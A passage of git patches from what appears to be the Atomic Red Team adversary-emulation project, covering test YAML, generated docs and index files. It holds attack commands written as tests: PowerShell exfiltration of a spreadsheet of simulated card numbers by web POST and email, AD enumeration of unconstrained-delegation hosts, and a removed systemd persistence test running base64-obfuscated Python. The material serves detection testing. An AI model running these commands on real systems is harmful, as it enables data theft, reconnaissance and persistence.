description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ' name: powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 74a09cdb..9f34ff74 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" +Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} ``` @@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm +Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ``` From 9b357633812ff2efdd473075aac619e00ffbf6df Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Fri, 4 Jun 2021 12:51:02 -0400 Subject: [PATCH 09/14] adds test for enumerating unconstrained delegation (#1495) * adds test for enumerating unconstrained delegation * small update to wording on dependency Co-authored-by: Carrie Roberts --- atomics/T1087.002/T1087.002.yaml | 48 +++++++++++++++++++++++++++++--- 1 file changed, 44 insertions(+), 4 deletions(-) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index d8f3a3f4..de4e2e26 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -69,7 +69,7 @@ atomic_tests: name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx supported_platforms: @@ -93,7 +93,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Admins auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ supported_platforms: @@ -117,7 +117,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory User Objects auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -141,7 +141,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Exchange AD Objects auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -173,3 +173,43 @@ atomic_tests: command: | net user administrator /domain name: command_prompt + +- name: Enumerate Active Directory for Unconstrained Delegation + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: | + PowerShell ActiveDirectory Module must be installed + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: | + Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} From 3afb4da266a1b42b55a0e8f003c441cedd482acb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 16:51:20 +0000 Subject: [PATCH 10/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1087.002/T1087.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index de4e2e26..61822ffb 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -175,6 +175,7 @@ atomic_tests: name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b description: | Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 361e31fb..409c774d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -705,3 +705,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 +46f8dbe9-22a5-4770-8513-66119c5be63b From 6c81bb1b0ba902269223281b5e3642f807bb6052 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 16:51:26 +0000 Subject: [PATCH 11/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 43 ++++++++++++++ atomics/T1087.002/T1087.002.md | 57 +++++++++++++++++++ 6 files changed, 104 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8f816a2c..0e530577 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -620,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 703da0de..5d54166f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -438,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d1a78b05..a9ae5a7c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1121,6 +1121,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d1f5864e..5b6382dc 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -820,6 +820,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7db65eb5..69c30c6a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -49429,6 +49429,49 @@ discovery: ' name: command_prompt + - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: 'PowerShell ActiveDirectory Module must be installed + +' + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' + -Server #{domain} + +' T1069.002: technique: external_references: diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 2b80197a..f39060c1 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain @@ -344,4 +346,59 @@ net user administrator /domain +
+
+ +## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation +Attackers may attempt to query for computer objects with the UserAccountControl property +'TRUSTED_FOR_DELEGATION' (0x80000;524288) set +More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce +Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain FQDN | String | contoso.com| +| uac_prop | UAC Property to search | String | 524288| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: PowerShell ActiveDirectory Module must be installed +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + +
From 753c1d59ee78c8999eff65b84623e4c1c6e5cf31 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:12:47 +0000 Subject: [PATCH 12/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.002/T1543.002.md | 65 ---------------------------------- 1 file changed, 65 deletions(-) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 6f2f4e4b..c9bfec54 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) -- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) -
@@ -77,67 +75,4 @@ systemctl daemon-reload -
-
- -## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -cat > /etc/init.d/T1543.002 << EOF -#!/bin/bash -### BEGIN INIT INFO -# Provides : Atomic Test T1543.002 -# Required-Start: $all -# Required-Stop : -# Default-Start: 2 3 4 5 -# Default-Stop: -# Short Description: Atomic Test for Systemd Service Creation -### END INIT INFO -python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" -EOF - -chmod +x /etc/init.d/T1543.002 -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; -systemctl enable T1543.002 -systemctl start T1543.002 - -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 -systemctl daemon-reload -systemctl restart T1543.002 -``` - -#### Cleanup Commands: -```bash -systemctl stop T1543.002 -systemctl disable T1543.002 -rm -rf /etc/init.d/T1543.002 -systemctl daemon-reload -``` - - - -#### Dependencies: Run with `bash`! -##### Description: System must be Ubuntu ,Kali OR CentOS. -##### Check Prereq Commands: -```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; -``` -##### Get Prereq Commands: -```bash -echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. -``` - - - -
From 1f1a002d89edfcb4101aed55c1dad905a7826219 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 17:14:19 +0000 Subject: [PATCH 13/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1037.004/T1037.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 9ec58a6f..6004b8b4 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -17,6 +17,7 @@ atomic_tests: - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: | Modify rc.common @@ -35,6 +36,7 @@ atomic_tests: origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: | Modify rc.local diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 409c774d..e78c5f95 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -706,3 +706,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 46f8dbe9-22a5-4770-8513-66119c5be63b +c33f3d80-5f04-419b-a13a-854d1cbdbf3a +126f71af-e1c9-405c-94ef-26a47b16c102 From 94d442bcd63fa9a8f802aecd8f0eaa7bd1157c79 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:14:26 +0000 Subject: [PATCH 14/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 4 + atomics/Indexes/Indexes-CSV/linux-index.csv | 4 + atomics/Indexes/Indexes-Markdown/index.md | 4 + .../Indexes/Indexes-Markdown/linux-index.md | 8 +- atomics/Indexes/Matrices/linux-matrix.md | 4 +- atomics/Indexes/index.yaml | 84 +++++++++++++++ atomics/T1037.004/T1037.004.md | 68 ++++++++++++ atomics/T1137.004/T1137.004.md | 102 ++++-------------- 9 files changed, 194 insertions(+), 86 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 31d2834b..fbe9e18a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{